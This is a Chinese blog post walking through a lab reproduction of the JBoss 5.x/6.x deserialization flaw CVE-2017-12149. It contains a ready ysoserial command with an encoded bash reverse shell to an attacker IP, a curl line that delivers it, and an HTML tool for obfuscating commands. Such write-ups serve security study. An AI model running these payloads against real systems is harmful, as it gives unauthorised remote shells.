JBoss 5.x/6.x 反序列化漏洞复现(CVE-2017-12149)

最新推荐文章于 2024-03-03 09:57:51 发布
原创 最新推荐文章于 2024-03-03 09:57:51 发布 · 1.3k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #中间件 #安全 #web安全 #java

本文详细介绍了Jboss的HttpInvoker组件中存在的一处Java反序列化漏洞(CVE-2017-12149)。该漏洞允许攻击者通过发送特制的POST请求,利用ReadOnlyAccessFilter过滤器的反序列化过程,执行任意命令。文中提供了漏洞复现步骤,包括如何构造payload,并展示了如何使用ysoserial.jar工具生成利用此漏洞的payload。此外,还演示了如何通过curl发送payload,成功反弹shell。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

漏洞复现

启动环境

该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化,采用其他反序列化利用链就可以了

使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,需要对命令进行一次编码。

<!DOCTYPE html>
<html>
<head>
    <title>java runtime exec usage...</title>
</head>
<body>
    <p>Input type:
<input type="radio" id="bash" name="option" value="bash" onclick="processInput();" checked=""><label for="bash">Bash</label>
<input type="radio" id="powershell" name="option" value="powershell" onclick="processInput();"><label for="powershell">PowerShell</label>
<input type="radio" id="python" name="option" value="python" onclick="processInput();"><label for="python">Python</label>
<input type="radio" id="perl" name="option" value="perl" onclick="processInput();"><label for="perl">Perl</label></p>

    <p><textarea rows="10" style="width: 100%; box-sizing: border-box;" id="input" placeholder="Type Bash here..."></textarea>
<textarea rows="5" style="width: 100%; box-sizing: border-box;" id="output" onclick="this.focus(); this.select();" readonly=""></textarea></p>

<script>
  var taInput = document.querySelector('textarea#input');
  var taOutput = document.querySelector('textarea#output');

  function processInput() {
    var option = document.querySelector('input[name="option"]:checked').value;

    switch (option) {
      case 'bash':
        taInput.placeholder = 'Type Bash here...'
        taOutput.value = 'bash -c {echo,' + btoa(taInput.value) + '}|{base64,-d}|{bash,-i}';
        break;
      case 'powershell':
        taInput.placeholder = 'Type PowerShell here...'
        poshInput = ''
        for (var i = 0; i < taInput.value.length; i++) { poshInput += taInput.value[i] + unescape("%00"); }
        taOutput.value = 'powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc ' + btoa(poshInput);
        break;
      case 'python':
        taInput.placeholder = 'Type Python here...'
        taOutput.value = "python -c exec('" + btoa(taInput.value) + "'.decode('base64'))";
        break;
      case 'perl':
        taInput.placeholder = 'Type Perl here...'
        taOutput.value = "perl -MMIME::Base64 -e eval(decode_base64('" + btoa(taInput.value) + "'))";
        break;
      default:
        taOutput.value = ''
    }

    if (!taInput.value) taOutput.value = '';
  }

  taInput.addEventListener('input', processInput, false);
</script>

</body>
</html>

利用ysoserial.jar工具构造payload 

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljk2LjEvMTIzNCAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser

先开启监听:

然后将生成的payload通过post方法发送到目标服务器的/invoker/readonly:

利用curl发送,

curl http://192.168.96.168:8080/invoker/readonly --data-binary @poc.ser

 

 

成功反弹shell

参考:

JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149复现
薛定谔嘚喵博客
05-11 766
漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
网安漏洞复现系列:漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
最新发布
weixin_54626591的博客
05-06 408
漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
墨者_JBoss 5.x / 6.x反序列化漏洞分析溯源
weixin_50698958的博客
10-20 447
靶场: https://www.mozhe.cn/bug/detail/bVk4Z1hPRktPZStBVWV6QUw2YmY0dz09bW96aGUmozhe 背景介绍 JBoss 5.x / 6.x反序列化漏洞分析溯源 实训目标 1、了解JBoss 5.x / 6.x反序列化漏洞形成原理; 2、掌握JBoss 5.x / 6.x反序列化漏洞利用方法; 解题方向 利用JBoss 5.x / 6.x反序列化漏洞执行任意代码。 key在根目录; 解题思路: 访问JBoss漏洞页面,响应码..
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149复现
YouthBelief的博客
11-01 735
JBoss漏洞复现前言一、JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149)0x01 漏洞描述0x02 影响范围0x03 漏洞利用工具直接利用0x04 漏洞修复总结 前言 使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码。 一、JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149) 0x01 漏洞描述 该漏洞Java反序列化错误类型,存在于 Jboss 的 Ht
JBoss 5.x6.x 反序列化漏洞CVE-2017-12149
weixin_47311099的博客
12-08 317
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149) 该漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。 环境启动 vulhub进入vulhub/jboss/CVE-2017-12149启动,需要等2分钟左右 docker-compose up -d 访问本机ip的8080端口 漏洞复现 使用工具检
JBoss JMXInvokerServlet 反序列化漏洞CVE-2015-7501)
黑白的博客
12-21 2127
声明 好好学习,天天向上 漏洞描述 这是经典的JBoss反序列化漏洞JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。 影响范围 JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10 JBoss AS (Wildly) 6 and earlier JBoss A-MQ 6.2.0 JBoss Fuse 6
JBoss漏洞 - CVE-2017-12149
HAKUNAMATATATTA的博客
12-14 2052
JBOSSApplication Server 反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。该漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过滤器中没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
CVE-2017-12149JBOSSas6.X反序列化(反弹shell版)
08-08
【标题】"CVE-2017-12149 JBOSS AS 6.X 反序列化漏洞详解及反弹shell技术" 【内容】 CVE-2017-12149是一个针对JBOSS Application Server 6.x版本的严重安全漏洞,它涉及到了Java对象的反序列化过程。在Java中,反...
JBossMQJMS 反序列化漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理反序列化的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
vulhub中JBoss 4.x JBossMQ JMS 反序列化漏洞复现CVE-2017-7504)
yougexiaojiuguan的博客
03-03 347
漏洞复现过程中的记录
jboss-CVE-2017-12149
01-22
Jboss反序列化漏洞利用工具,CVE-2017-12149Jboss反序列化漏洞利用工具,CVE-2017-12149
渗透测试-JBoss 5.x/6.x反序列化漏洞
道阻且长,行则将至
07-08 1878
漏洞概述 2017年8月30日,Redhat公司发布了一个JbossAS 5.x系统的远程代码执行严重漏洞通告,相应的漏洞编号为 CVE-2017-12149。近期有安全研究者发现JbossAS 6.x也受该漏洞影响,攻击者可能利用此漏洞无需用户验证在系统上执行任意命令。 类型 描述 漏洞名称 JBOSSAS5.x/6.x反序列化命令执行漏洞 威胁类型 远程命令执行 威胁等级 高 漏洞ID CVE-2017-12149 受影响系统及应用版本 Jboss AS 5.x、Jbos
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149
willow_liang的博客
10-24 292
漏洞原理: 漏洞复现 下载利用工具 javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java javac将java源文件编译为class字节码文件。-cp指明.java文件中import类的位置 java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap "touch /tmp/success"
JBoss 5.x/6.x 反序列化漏洞CVE-2017-12149
zzzzz1284的博客
03-13 335
CVE-2017-12149
JBoss5.x / 6.x反序列化漏洞CVE-2017-12149
Kevin's Blog
06-08 969
一、漏洞介绍 1.1 漏洞详情   该漏洞Java反序列化错误类型,存在于JBoss的HttpInvoker组件中的ReadOnlyAccessFilter过滤器中。该过滤器没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化。该漏洞在内网中比较常见。 1.2 影响版本 JBoss 5.x 和 6.x 二、环境搭建 受害者:192.168.159.129(vulhub) 攻击者:192.168.158.128(kali) 》》进入到如下目录启动环境 》》查看启动的端口 》》访问we
JBoss5.x6.x 反序列化漏洞
weixin_44110913的博客
11-05 348
JBOSS 下载地址:http://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip EXP 下载地址:https://github.com/yunxu1/jboss-_CVE-2017-12149 2). 环境搭建 wget http://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip 第二步:修改配置文件,使网络中的主机都
JBoss 5.x/6.x 反序列化漏洞复现(CVE-2017-12149)
wutiangui的博客
09-11 504
① ysoserial是一款目前最流行的Java反序列化Payload生成工具,目前支持29种的Payload生成。所以我们使用 ysoserial 来复现生成序列化数据,并重定向到exp.ser文件。该漏洞存在于http invoker组件的ReadOnlyAccessFilter的doFilter中,在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化。执行完该命令之后,会在本地桌面生成一个序列化的文件exp.ser,并利用cat查看其内容。
JBOSS as 6.X严重漏洞CVE-2017-12149及其反弹shell利用
CVE-2017-12149是一个在JBOSS Application Server (JBoss AS) 6.X版本中发现的安全漏洞。这个漏洞存在于JBoss AS的Web应用程序部署过程中,主要原因是应用服务器未能正确地限制文件上传的功能,导致攻击者可以上传...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值